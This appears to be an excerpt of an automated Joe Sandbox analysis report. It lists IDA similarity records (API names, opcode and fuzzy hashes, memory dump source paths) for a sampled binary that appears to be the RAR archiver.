                                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                                              • Snapshot File: hcaresult_105_2_7ff6bbcb0000_rar.jbxd
                                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                                              • API ID: ProcessToken$AdjustCloseCurrentErrorHandleLastLookupOpenPrivilegePrivilegesValue
                                                                                                                                                                                                                              • String ID:
                                                                                                                                                                                                                              • API String ID: 3398352648-0
                                                                                                                                                                                                                              • Opcode ID: a68743f79c0fdba85814f3f902c484d9b924ee88fd84a1759920b380f60e4056
                                                                                                                                                                                                                              • Instruction ID: eaceaf08658ab616f56edf132a9b449bbf9133e79fc56e08e1f284935897c345
                                                                                                                                                                                                                              • Opcode Fuzzy Hash: a68743f79c0fdba85814f3f902c484d9b924ee88fd84a1759920b380f60e4056
                                                                                                                                                                                                                              • Instruction Fuzzy Hash: BC113032618B8286E754CF25E45456AB7B4FB8CB80F545535EB8E83A28DF3CE045CB40
                                                                                                                                                                                                                              APIs
                                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                                              • Source File: 00000069.00000002.2058751378.00007FF6BBCB1000.00000020.00000001.01000000.00000021.sdmp, Offset: 00007FF6BBCB0000, based on PE: true
                                                                                                                                                                                                                              • Associated: 00000069.00000002.2058709732.00007FF6BBCB0000.00000002.00000001.01000000.00000021.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000069.00000002.2058823399.00007FF6BBD20000.00000002.00000001.01000000.00000021.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000069.00000002.2058874469.00007FF6BBD38000.00000004.00000001.01000000.00000021.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000069.00000002.2058914324.00007FF6BBD39000.00000008.00000001.01000000.00000021.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000069.00000002.2058952098.00007FF6BBD3A000.00000004.00000001.01000000.00000021.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000069.00000002.2058952098.00007FF6BBD44000.00000004.00000001.01000000.00000021.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000069.00000002.2058952098.00007FF6BBD4E000.00000004.00000001.01000000.00000021.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000069.00000002.2058952098.00007FF6BBD56000.00000004.00000001.01000000.00000021.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000069.00000002.2059150760.00007FF6BBD58000.00000002.00000001.01000000.00000021.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000069.00000002.2059191683.00007FF6BBD5E000.00000002.00000001.01000000.00000021.sdmpDownload File
                                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                                              • Snapshot File: hcaresult_105_2_7ff6bbcb0000_rar.jbxd
                                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                                              • API ID: ExceptionThrow$ErrorLaststd::bad_alloc::bad_alloc
                                                                                                                                                                                                                              • String ID:
                                                                                                                                                                                                                              • API String ID: 3116915952-0
                                                                                                                                                                                                                              • Opcode ID: 8527d030e3cc7ba1d2d2188fa28773b5d1ef2776714c206f3930b60042c0ccec
                                                                                                                                                                                                                              • Instruction ID: b97b423a1325c91305586c91663740d74528d4d27d8c188e9b7ccb208e60e9c3
                                                                                                                                                                                                                              • Opcode Fuzzy Hash: 8527d030e3cc7ba1d2d2188fa28773b5d1ef2776714c206f3930b60042c0ccec
                                                                                                                                                                                                                              • Instruction Fuzzy Hash: 42E15D26A1CA8A82EA24EB29E4585FD2775FB8D784F445032DF4D8B7A6DF3CE505C700
                                                                                                                                                                                                                              APIs
                                                                                                                                                                                                                              • CreateFileW.KERNEL32(?,?,?,00007FF6BBCD11B0,?,?,?,00000000,?,?,00007FF6BBCCF30F,00000000,00007FF6BBCB6380,?,00007FF6BBCB2EC8), ref: 00007FF6BBCD3AC4
                                                                                                                                                                                                                              • CreateFileW.KERNEL32(?,?,?,00007FF6BBCD11B0,?,?,?,00000000,?,?,00007FF6BBCCF30F,00000000,00007FF6BBCB6380,?,00007FF6BBCB2EC8), ref: 00007FF6BBCD3B0A
                                                                                                                                                                                                                              • DeviceIoControl.KERNEL32 ref: 00007FF6BBCD3B55
                                                                                                                                                                                                                              • CloseHandle.KERNEL32(?,?,?,00007FF6BBCD11B0,?,?,?,00000000,?,?,00007FF6BBCCF30F,00000000,00007FF6BBCB6380,?,00007FF6BBCB2EC8), ref: 00007FF6BBCD3B60
                                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                                              • Source File: 00000069.00000002.2058751378.00007FF6BBCB1000.00000020.00000001.01000000.00000021.sdmp, Offset: 00007FF6BBCB0000, based on PE: true
                                                                                                                                                                                                                              • Associated: 00000069.00000002.2058709732.00007FF6BBCB0000.00000002.00000001.01000000.00000021.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000069.00000002.2058823399.00007FF6BBD20000.00000002.00000001.01000000.00000021.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000069.00000002.2058874469.00007FF6BBD38000.00000004.00000001.01000000.00000021.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000069.00000002.2058914324.00007FF6BBD39000.00000008.00000001.01000000.00000021.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000069.00000002.2058952098.00007FF6BBD3A000.00000004.00000001.01000000.00000021.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000069.00000002.2058952098.00007FF6BBD44000.00000004.00000001.01000000.00000021.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000069.00000002.2058952098.00007FF6BBD4E000.00000004.00000001.01000000.00000021.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000069.00000002.2058952098.00007FF6BBD56000.00000004.00000001.01000000.00000021.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000069.00000002.2059150760.00007FF6BBD58000.00000002.00000001.01000000.00000021.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000069.00000002.2059191683.00007FF6BBD5E000.00000002.00000001.01000000.00000021.sdmpDownload File
                                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                                              • Snapshot File: hcaresult_105_2_7ff6bbcb0000_rar.jbxd
                                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                                              • API ID: CreateFile$CloseControlDeviceHandle
                                                                                                                                                                                                                              • String ID:
                                                                                                                                                                                                                              • API String ID: 998109204-0
                                                                                                                                                                                                                              • Opcode ID: eff6c290fb367c5b76febf0d76c2ae076eb862a10f6af346eafb357c39462c7d
                                                                                                                                                                                                                              • Instruction ID: 4ecc1b57a8dbd158b76502ad7a97ee5c11b94c25cfccf6913f8123103abba417
                                                                                                                                                                                                                              • Opcode Fuzzy Hash: eff6c290fb367c5b76febf0d76c2ae076eb862a10f6af346eafb357c39462c7d
                                                                                                                                                                                                                              • Instruction Fuzzy Hash: CA316B36618B8186E7648F55F4446AAB7A4FB887E4F100336EBA953BE8CF3CD5558B00
                                                                                                                                                                                                                              Strings
                                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                                              • Source File: 00000069.00000002.2058751378.00007FF6BBCB1000.00000020.00000001.01000000.00000021.sdmp, Offset: 00007FF6BBCB0000, based on PE: true
                                                                                                                                                                                                                              • Associated: 00000069.00000002.2058709732.00007FF6BBCB0000.00000002.00000001.01000000.00000021.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000069.00000002.2058823399.00007FF6BBD20000.00000002.00000001.01000000.00000021.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000069.00000002.2058874469.00007FF6BBD38000.00000004.00000001.01000000.00000021.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000069.00000002.2058914324.00007FF6BBD39000.00000008.00000001.01000000.00000021.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000069.00000002.2058952098.00007FF6BBD3A000.00000004.00000001.01000000.00000021.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000069.00000002.2058952098.00007FF6BBD44000.00000004.00000001.01000000.00000021.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000069.00000002.2058952098.00007FF6BBD4E000.00000004.00000001.01000000.00000021.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000069.00000002.2058952098.00007FF6BBD56000.00000004.00000001.01000000.00000021.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000069.00000002.2059150760.00007FF6BBD58000.00000002.00000001.01000000.00000021.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000069.00000002.2059191683.00007FF6BBD5E000.00000002.00000001.01000000.00000021.sdmpDownload File
                                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                                              • Snapshot File: hcaresult_105_2_7ff6bbcb0000_rar.jbxd
                                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                                              • API ID:
                                                                                                                                                                                                                              • String ID: CMT
                                                                                                                                                                                                                              • API String ID: 0-2756464174
                                                                                                                                                                                                                              • Opcode ID: cbae23b477236efd5552a84d69818ed097b452cbaf440f48f7b5ba52d2a69677
• Instruction ID: 1d5e5bc9ac82fd6f4391598fc0eddf475ae500dd8cc49e39542667d04754b506
• Opcode Fuzzy Hash: cbae23b477236efd5552a84d69818ed097b452cbaf440f48f7b5ba52d2a69677
• Instruction Fuzzy Hash: 92D1CF62A1868686EA34EB29D4581BD63B0FF8DB80F544532DB9E876F5DF3CE541C304
APIs
• _invalid_parameter_noinfo.LIBCMT ref: 00007FF6BBD18704
  • Part of subcall function 00007FF6BBD14E3C: GetCurrentProcess.KERNEL32(00007FF6BBD19CC5), ref: 00007FF6BBD14E69
Strings
Memory Dump Source
• Source File: 00000069.00000002.2058751378.00007FF6BBCB1000.00000020.00000001.01000000.00000021.sdmp, Offset: 00007FF6BBCB0000, based on PE: true
• Associated: 00000069.00000002.2058709732.00007FF6BBCB0000.00000002.00000001.01000000.00000021.sdmp
• Associated: 00000069.00000002.2058823399.00007FF6BBD20000.00000002.00000001.01000000.00000021.sdmp
• Associated: 00000069.00000002.2058874469.00007FF6BBD38000.00000004.00000001.01000000.00000021.sdmp
• Associated: 00000069.00000002.2058914324.00007FF6BBD39000.00000008.00000001.01000000.00000021.sdmp
• Associated: 00000069.00000002.2058952098.00007FF6BBD3A000.00000004.00000001.01000000.00000021.sdmp
• Associated: 00000069.00000002.2058952098.00007FF6BBD44000.00000004.00000001.01000000.00000021.sdmp
• Associated: 00000069.00000002.2058952098.00007FF6BBD4E000.00000004.00000001.01000000.00000021.sdmp
• Associated: 00000069.00000002.2058952098.00007FF6BBD56000.00000004.00000001.01000000.00000021.sdmp
• Associated: 00000069.00000002.2059150760.00007FF6BBD58000.00000002.00000001.01000000.00000021.sdmp
• Associated: 00000069.00000002.2059191683.00007FF6BBD5E000.00000002.00000001.01000000.00000021.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_105_2_7ff6bbcb0000_rar.jbxd
Similarity
• API ID: CurrentProcess_invalid_parameter_noinfo
• String ID: *?$.
• API String ID: 2518042432-3972193922
• Opcode ID: 354f185c14a0bc8d05e3972864cc7dbacf8a132eb4984f49e6355014e857c6aa
• Instruction ID: c3b8d82b4ce5100a16e67642e5606495364b9bb05af275e8fc76cb9e2f5c7ad5
• Opcode Fuzzy Hash: 354f185c14a0bc8d05e3972864cc7dbacf8a132eb4984f49e6355014e857c6aa
• Instruction Fuzzy Hash: D951D162F25AA585EB18DFAAA8004AC67A4FB48BD8B484631DF0D97B95DF3DD042C710
APIs
Memory Dump Source
• Source File: 00000069.00000002.2058751378.00007FF6BBCB1000.00000020.00000001.01000000.00000021.sdmp, Offset: 00007FF6BBCB0000, based on PE: true
• Associated: 00000069.00000002.2058709732.00007FF6BBCB0000.00000002.00000001.01000000.00000021.sdmp
• Associated: 00000069.00000002.2058823399.00007FF6BBD20000.00000002.00000001.01000000.00000021.sdmp
• Associated: 00000069.00000002.2058874469.00007FF6BBD38000.00000004.00000001.01000000.00000021.sdmp
• Associated: 00000069.00000002.2058914324.00007FF6BBD39000.00000008.00000001.01000000.00000021.sdmp
• Associated: 00000069.00000002.2058952098.00007FF6BBD3A000.00000004.00000001.01000000.00000021.sdmp
• Associated: 00000069.00000002.2058952098.00007FF6BBD44000.00000004.00000001.01000000.00000021.sdmp
• Associated: 00000069.00000002.2058952098.00007FF6BBD4E000.00000004.00000001.01000000.00000021.sdmp
• Associated: 00000069.00000002.2058952098.00007FF6BBD56000.00000004.00000001.01000000.00000021.sdmp
• Associated: 00000069.00000002.2059150760.00007FF6BBD58000.00000002.00000001.01000000.00000021.sdmp
• Associated: 00000069.00000002.2059191683.00007FF6BBD5E000.00000002.00000001.01000000.00000021.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_105_2_7ff6bbcb0000_rar.jbxd
Similarity
• API ID: AllocateCheckFreeInitializeMembershipToken
• String ID:
• API String ID: 3429775523-0
• Opcode ID: db3c1d02e190598f29aa164aeddc5f855d0a4ca8ba77325bab1d25996cb1689a
• Instruction ID: c896e45e59c7abcea306fafbcae97b4fad9d05064054ca909d28d3e3e23dcb38
• Opcode Fuzzy Hash: db3c1d02e190598f29aa164aeddc5f855d0a4ca8ba77325bab1d25996cb1689a
• Instruction Fuzzy Hash: 8D111C72B14A418EE7148FB9E4912AE77B0FB48748F40563ADB8D93A68DF3CD144CB04
APIs
Memory Dump Source
• Source File: 00000069.00000002.2058751378.00007FF6BBCB1000.00000020.00000001.01000000.00000021.sdmp, Offset: 00007FF6BBCB0000, based on PE: true
• Associated: 00000069.00000002.2058709732.00007FF6BBCB0000.00000002.00000001.01000000.00000021.sdmp
• Associated: 00000069.00000002.2058823399.00007FF6BBD20000.00000002.00000001.01000000.00000021.sdmp
• Associated: 00000069.00000002.2058874469.00007FF6BBD38000.00000004.00000001.01000000.00000021.sdmp
• Associated: 00000069.00000002.2058914324.00007FF6BBD39000.00000008.00000001.01000000.00000021.sdmp
• Associated: 00000069.00000002.2058952098.00007FF6BBD3A000.00000004.00000001.01000000.00000021.sdmp
• Associated: 00000069.00000002.2058952098.00007FF6BBD44000.00000004.00000001.01000000.00000021.sdmp
• Associated: 00000069.00000002.2058952098.00007FF6BBD4E000.00000004.00000001.01000000.00000021.sdmp
• Associated: 00000069.00000002.2058952098.00007FF6BBD56000.00000004.00000001.01000000.00000021.sdmp
• Associated: 00000069.00000002.2059150760.00007FF6BBD58000.00000002.00000001.01000000.00000021.sdmp
• Associated: 00000069.00000002.2059191683.00007FF6BBD5E000.00000002.00000001.01000000.00000021.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_105_2_7ff6bbcb0000_rar.jbxd
Similarity
• API ID: ErrorFormatLastMessage
• String ID:
• API String ID: 3479602957-0
• Opcode ID: 5edc9aacada912d44111c0c5b3025bcfc37222d54029d4996b892e874874bebb
• Instruction ID: c266759fc2134d8da3bf03023a5ccc8e9aa61740b089d2e234ba137526af0e53
• Opcode Fuzzy Hash: 5edc9aacada912d44111c0c5b3025bcfc37222d54029d4996b892e874874bebb
• Instruction Fuzzy Hash: 91F05E31B08B8182E3108F6AB44412BA7A5FB99BD4F088534EB8993B69CF7CC5518B44
APIs
Memory Dump Source
• Source File: 00000069.00000002.2058751378.00007FF6BBCB1000.00000020.00000001.01000000.00000021.sdmp, Offset: 00007FF6BBCB0000, based on PE: true
• Associated: 00000069.00000002.2058709732.00007FF6BBCB0000.00000002.00000001.01000000.00000021.sdmp
• Associated: 00000069.00000002.2058823399.00007FF6BBD20000.00000002.00000001.01000000.00000021.sdmp
• Associated: 00000069.00000002.2058874469.00007FF6BBD38000.00000004.00000001.01000000.00000021.sdmp
• Associated: 00000069.00000002.2058914324.00007FF6BBD39000.00000008.00000001.01000000.00000021.sdmp
• Associated: 00000069.00000002.2058952098.00007FF6BBD3A000.00000004.00000001.01000000.00000021.sdmp
• Associated: 00000069.00000002.2058952098.00007FF6BBD44000.00000004.00000001.01000000.00000021.sdmp
• Associated: 00000069.00000002.2058952098.00007FF6BBD4E000.00000004.00000001.01000000.00000021.sdmp
• Associated: 00000069.00000002.2058952098.00007FF6BBD56000.00000004.00000001.01000000.00000021.sdmp
• Associated: 00000069.00000002.2059150760.00007FF6BBD58000.00000002.00000001.01000000.00000021.sdmp
• Associated: 00000069.00000002.2059191683.00007FF6BBD5E000.00000002.00000001.01000000.00000021.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_105_2_7ff6bbcb0000_rar.jbxd
Similarity
• API ID: DiskFreeSpace
• String ID:
• API String ID: 1705453755-0
• Opcode ID: 336a33042f1e52100b28f5a1ad6ae687e8956255ef3791e684bc327077314d0d
• Instruction ID: 581b6e06013a9210e29bc3fbd1ae8f40ad8597621b9387624f8bc4e5e91cc411
• Opcode Fuzzy Hash: 336a33042f1e52100b28f5a1ad6ae687e8956255ef3791e684bc327077314d0d
• Instruction Fuzzy Hash: DF012D2262868286EB70DB19E4553AAB3B1FB88744F800531E78CC6598DF2CD644CF40
APIs
Strings
Memory Dump Source
• Source File: 00000069.00000002.2058751378.00007FF6BBCB1000.00000020.00000001.01000000.00000021.sdmp, Offset: 00007FF6BBCB0000, based on PE: true
• Associated: 00000069.00000002.2058709732.00007FF6BBCB0000.00000002.00000001.01000000.00000021.sdmp
• Associated: 00000069.00000002.2058823399.00007FF6BBD20000.00000002.00000001.01000000.00000021.sdmp
• Associated: 00000069.00000002.2058874469.00007FF6BBD38000.00000004.00000001.01000000.00000021.sdmp
• Associated: 00000069.00000002.2058914324.00007FF6BBD39000.00000008.00000001.01000000.00000021.sdmp
• Associated: 00000069.00000002.2058952098.00007FF6BBD3A000.00000004.00000001.01000000.00000021.sdmp
• Associated: 00000069.00000002.2058952098.00007FF6BBD44000.00000004.00000001.01000000.00000021.sdmp
• Associated: 00000069.00000002.2058952098.00007FF6BBD4E000.00000004.00000001.01000000.00000021.sdmp
• Associated: 00000069.00000002.2058952098.00007FF6BBD56000.00000004.00000001.01000000.00000021.sdmp
• Associated: 00000069.00000002.2059150760.00007FF6BBD58000.00000002.00000001.01000000.00000021.sdmp
• Associated: 00000069.00000002.2059191683.00007FF6BBD5E000.00000002.00000001.01000000.00000021.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_105_2_7ff6bbcb0000_rar.jbxd
Similarity
• API ID: _invalid_parameter_noinfo
• String ID: INF$NAN$NAN(IND)$NAN(SNAN)$inf$nan$nan(ind)$nan(snan)
• API String ID: 3215553584-2617248754
• Opcode ID: 336881e81ddd14afa9560f251b33c86b073c2b2d41bd1fd01ec7cedf827ef5ce
• Instruction ID: cd937f801d2c09c060d2e47e2694988250106d75722e3469439008024b0a6ed3
• Opcode Fuzzy Hash: 336881e81ddd14afa9560f251b33c86b073c2b2d41bd1fd01ec7cedf827ef5ce
• Instruction Fuzzy Hash: 9541AA72B09B9589E708CF69E8517A933A4FB18388F44423AEF5C87BA5DE3DD065C340
                                                                                                                                                                                                                              APIs
                                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                                              • Source File: 00000069.00000002.2058751378.00007FF6BBCB1000.00000020.00000001.01000000.00000021.sdmp, Offset: 00007FF6BBCB0000, based on PE: true
                                                                                                                                                                                                                              • Associated: 00000069.00000002.2058709732.00007FF6BBCB0000.00000002.00000001.01000000.00000021.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000069.00000002.2058823399.00007FF6BBD20000.00000002.00000001.01000000.00000021.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000069.00000002.2058874469.00007FF6BBD38000.00000004.00000001.01000000.00000021.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000069.00000002.2058914324.00007FF6BBD39000.00000008.00000001.01000000.00000021.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000069.00000002.2058952098.00007FF6BBD3A000.00000004.00000001.01000000.00000021.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000069.00000002.2058952098.00007FF6BBD44000.00000004.00000001.01000000.00000021.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000069.00000002.2058952098.00007FF6BBD4E000.00000004.00000001.01000000.00000021.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000069.00000002.2058952098.00007FF6BBD56000.00000004.00000001.01000000.00000021.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000069.00000002.2059150760.00007FF6BBD58000.00000002.00000001.01000000.00000021.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000069.00000002.2059191683.00007FF6BBD5E000.00000002.00000001.01000000.00000021.sdmpDownload File
                                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                                              • Snapshot File: hcaresult_105_2_7ff6bbcb0000_rar.jbxd
                                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                                              • API ID: Console$Mode$Handle$Readfflush
                                                                                                                                                                                                                              • String ID:
                                                                                                                                                                                                                              • API String ID: 1039280553-0
                                                                                                                                                                                                                              • Opcode ID: 5c62bb105008418d5d8f1a35d4748ced2dc44b1bf30dc7e2d2292546f420945d
                                                                                                                                                                                                                              • Instruction ID: 69e25be96bcd1ad8687e638ad3b2b8c771cdf05e96cdccc5db5e2bfee700fc8a
                                                                                                                                                                                                                              • Opcode Fuzzy Hash: 5c62bb105008418d5d8f1a35d4748ced2dc44b1bf30dc7e2d2292546f420945d
                                                                                                                                                                                                                              • Instruction Fuzzy Hash: 56216235B18A829BEA149F29E8045396361FB8DBA1F540231EF4A47B74DF3CE446C744
                                                                                                                                                                                                                              APIs
                                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                                              • Source File: 00000069.00000002.2058751378.00007FF6BBCB1000.00000020.00000001.01000000.00000021.sdmp, Offset: 00007FF6BBCB0000, based on PE: true
                                                                                                                                                                                                                              • Associated: 00000069.00000002.2058709732.00007FF6BBCB0000.00000002.00000001.01000000.00000021.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000069.00000002.2058823399.00007FF6BBD20000.00000002.00000001.01000000.00000021.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000069.00000002.2058874469.00007FF6BBD38000.00000004.00000001.01000000.00000021.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000069.00000002.2058914324.00007FF6BBD39000.00000008.00000001.01000000.00000021.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000069.00000002.2058952098.00007FF6BBD3A000.00000004.00000001.01000000.00000021.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000069.00000002.2058952098.00007FF6BBD44000.00000004.00000001.01000000.00000021.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000069.00000002.2058952098.00007FF6BBD4E000.00000004.00000001.01000000.00000021.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000069.00000002.2058952098.00007FF6BBD56000.00000004.00000001.01000000.00000021.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000069.00000002.2059150760.00007FF6BBD58000.00000002.00000001.01000000.00000021.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000069.00000002.2059191683.00007FF6BBD5E000.00000002.00000001.01000000.00000021.sdmpDownload File
                                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                                              • Snapshot File: hcaresult_105_2_7ff6bbcb0000_rar.jbxd
                                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                                              • API ID: ExceptionThrowstd::bad_alloc::bad_alloc
                                                                                                                                                                                                                              • String ID:
                                                                                                                                                                                                                              • API String ID: 932687459-0
                                                                                                                                                                                                                              • Opcode ID: 17b6f32cd8d6fcc81585299b8a9163aaa78fd032cef7b8e26f7336cc4ddc1b9c
                                                                                                                                                                                                                              • Instruction ID: 9a8c94d6be61bdadb165d8945c05739c20d8487b9a9a57c18d43c2fa7be63fe6
                                                                                                                                                                                                                              • Opcode Fuzzy Hash: 17b6f32cd8d6fcc81585299b8a9163aaa78fd032cef7b8e26f7336cc4ddc1b9c
                                                                                                                                                                                                                              • Instruction Fuzzy Hash: CF81E922A0DA8699EB29DB29D4703BD6350FB4CB94F984A31DB4D87BB5DF7CE4418304
                                                                                                                                                                                                                              APIs
                                                                                                                                                                                                                              Strings
                                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                                              • Source File: 00000069.00000002.2058751378.00007FF6BBCB1000.00000020.00000001.01000000.00000021.sdmp, Offset: 00007FF6BBCB0000, based on PE: true
                                                                                                                                                                                                                              • Associated: 00000069.00000002.2058709732.00007FF6BBCB0000.00000002.00000001.01000000.00000021.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000069.00000002.2058823399.00007FF6BBD20000.00000002.00000001.01000000.00000021.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000069.00000002.2058874469.00007FF6BBD38000.00000004.00000001.01000000.00000021.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000069.00000002.2058914324.00007FF6BBD39000.00000008.00000001.01000000.00000021.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000069.00000002.2058952098.00007FF6BBD3A000.00000004.00000001.01000000.00000021.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000069.00000002.2058952098.00007FF6BBD44000.00000004.00000001.01000000.00000021.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000069.00000002.2058952098.00007FF6BBD4E000.00000004.00000001.01000000.00000021.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000069.00000002.2058952098.00007FF6BBD56000.00000004.00000001.01000000.00000021.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000069.00000002.2059150760.00007FF6BBD58000.00000002.00000001.01000000.00000021.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000069.00000002.2059191683.00007FF6BBD5E000.00000002.00000001.01000000.00000021.sdmpDownload File
                                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                                              • Snapshot File: hcaresult_105_2_7ff6bbcb0000_rar.jbxd
                                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                                              • API ID: swprintf
                                                                                                                                                                                                                              • String ID: ;%u$x%u$xc%u
                                                                                                                                                                                                                              • API String ID: 233258989-2277559157
                                                                                                                                                                                                                              • Opcode ID: 18e8202548affe00674286321b5f124759c48e138fb2ddf063aaae7488dbebd7
                                                                                                                                                                                                                              • Instruction ID: f01c2bf0823c4192e14907de196a3eb37256f17e7546b9a4519a2dfaaf991221
                                                                                                                                                                                                                              • Opcode Fuzzy Hash: 18e8202548affe00674286321b5f124759c48e138fb2ddf063aaae7488dbebd7
                                                                                                                                                                                                                              • Instruction Fuzzy Hash: E202BD22B1C68681EA38DA2991493FE67B1BF49780F000035DB9EDB6A7DFADF445C311
                                                                                                                                                                                                                              APIs
                                                                                                                                                                                                                              Strings
                                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                                              • Source File: 00000069.00000002.2058751378.00007FF6BBCB1000.00000020.00000001.01000000.00000021.sdmp, Offset: 00007FF6BBCB0000, based on PE: true
                                                                                                                                                                                                                              • Associated: 00000069.00000002.2058709732.00007FF6BBCB0000.00000002.00000001.01000000.00000021.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000069.00000002.2058823399.00007FF6BBD20000.00000002.00000001.01000000.00000021.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000069.00000002.2058874469.00007FF6BBD38000.00000004.00000001.01000000.00000021.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000069.00000002.2058914324.00007FF6BBD39000.00000008.00000001.01000000.00000021.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000069.00000002.2058952098.00007FF6BBD3A000.00000004.00000001.01000000.00000021.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000069.00000002.2058952098.00007FF6BBD44000.00000004.00000001.01000000.00000021.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000069.00000002.2058952098.00007FF6BBD4E000.00000004.00000001.01000000.00000021.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000069.00000002.2058952098.00007FF6BBD56000.00000004.00000001.01000000.00000021.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000069.00000002.2059150760.00007FF6BBD58000.00000002.00000001.01000000.00000021.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000069.00000002.2059191683.00007FF6BBD5E000.00000002.00000001.01000000.00000021.sdmpDownload File
                                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                                              • Snapshot File: hcaresult_105_2_7ff6bbcb0000_rar.jbxd
                                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                                              • API ID: FileMoveNamePath$CompareLongShortStringswprintf
                                                                                                                                                                                                                              • String ID: rtmp%d
                                                                                                                                                                                                                              • API String ID: 2308737092-3303766350
                                                                                                                                                                                                                              • Opcode ID: de0bcd3fdd60b8f1859e4975922cee0e0ab7dbe13660142ab9f58961243ff5d4
                                                                                                                                                                                                                              • Instruction ID: b12e2fe16e794663e519c11788ee222e497519776e1a1075d6457e0fe50d8dd3
                                                                                                                                                                                                                              • Opcode Fuzzy Hash: de0bcd3fdd60b8f1859e4975922cee0e0ab7dbe13660142ab9f58961243ff5d4
                                                                                                                                                                                                                              • Instruction Fuzzy Hash: 9D518416B985C685EA30DF29E8591FD6361BF48784F551131DB0DC7AAADF3CE605C310
APIs
Strings
Memory Dump Source
• Source File: 00000069.00000002.2058751378.00007FF6BBCB1000.00000020.00000001.01000000.00000021.sdmp, Offset: 00007FF6BBCB0000, based on PE: true
• Associated: 00000069.00000002.2058709732.00007FF6BBCB0000.00000002.00000001.01000000.00000021.sdmp
• Associated: 00000069.00000002.2058823399.00007FF6BBD20000.00000002.00000001.01000000.00000021.sdmp
